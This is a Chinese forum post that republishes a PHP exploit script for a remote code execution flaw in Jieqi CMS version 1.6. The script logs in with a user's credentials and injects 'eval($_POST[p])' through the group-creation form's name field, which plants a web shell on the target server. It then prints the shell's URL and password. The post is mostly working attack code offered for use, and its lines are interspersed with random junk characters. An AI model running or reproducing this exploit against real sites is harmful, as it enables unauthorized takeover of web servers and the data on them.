杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
0 {: m/ W, L$ b% t: P: w Y5 I5 n& m! x+ B7 Q: o. `6 h$ [
; o9 B! m1 o2 d3 r. k该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
- E' _, e' H& \9 ]; }8 ~( H) y2 V0 i- [ 需要有一个能创建圈子的用户。
* l! N' T$ d3 q7 W
: F+ \0 Y' n- _. b! `- I4 K" q5 p<?php8 m/ K& m! e7 Q& B2 U& v6 J
/ r8 g% u' J, w4 G" vprint_r('
/ x2 E- S% K; l" D W. b9 X# F: m! n) R+---------------------------------------------------------------------------+8 f$ J# h0 G5 y* [! u* W K7 r
Jieqi CMS V1.6 PHP Code Injection Exploit
) V9 R7 m* y9 G8 t* a& x( v+ hby flyh4t1 j F% H6 T- \" p8 p" Q9 y/ n
mail: phpsec at hotmail dot com, ?. X( _+ C- E, Z( a& t
team: http://www.wolvez.org" K3 ?7 M, S/ [
+---------------------------------------------------------------------------+" X- p! ]0 m9 p% j
'); /**
& U& K! G: g0 _+ q' n) W3 H, I * works regardless of php.ini settings0 k. b' e, `8 S% N) }
*/ if ($argc < 5) { print_r('8 _! c4 Z' N+ [3 a. H2 L! Y# B
+---------------------------------------------------------------------------+
) T" I8 g- d, DUsage: php '.$argv[0].' host path username- I6 q3 q) D; R2 `- x; c7 X: _/ ?
host: target server (ip/hostname)' }; u. q: I, ]6 D9 Q9 V1 H' _
path: path to jieqicms
8 s0 J# h G/ N: Z) xuasename: a username who can create group
! Z$ {. E, R- q# t7 H0 Q( AExample:0 Q. E" m; h0 Q1 ?" m: w0 F6 t8 d
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password, t$ j Z) \7 j0 U: H
+---------------------------------------------------------------------------+
* K( ~6 j0 T" Q8 \'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
$ Y" H: K# Z- t5 a0 ~Content-Disposition: form-data; name="gname"8 z' ?0 i; c. l1 K* R* h
3 H s1 D7 J! X! @5 d! p
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t7 ?7 f9 F/ V8 ?6 d
-----------------------------23281168279961
; _9 {4 K+ T: l2 m% o5 BContent-Disposition: form-data; name="gcatid"( O5 h# i7 I+ E+ M
5 ]6 w# Y8 r6 X1 U( ~/ F3 w5 C
1; v0 _& P+ m+ G+ s1 V
-----------------------------23281168279961
5 {! k) J8 B! o8 s2 E: TContent-Disposition: form-data; name="gaudit"1 }6 M: z- o) T% h" t
1 i' q M/ N) h12 y( l' X8 v2 V
-----------------------------23281168279961( G3 |, a7 `- d
Content-Disposition: form-data; name="gbrief"7 r5 z" I2 C1 F0 I3 ^/ w0 ?
/ U, f+ s$ X5 f L- t
1
0 q# I' b& e- y$ g$ \: j d6 n# q-----------------------------23281168279961--
0 c8 W7 j# S: b. u5 k7 }# @'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
% B- N# a3 p8 ~3 J' p3 N . N7 B3 {$ ?2 ^& m: i- w4 v1 F
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对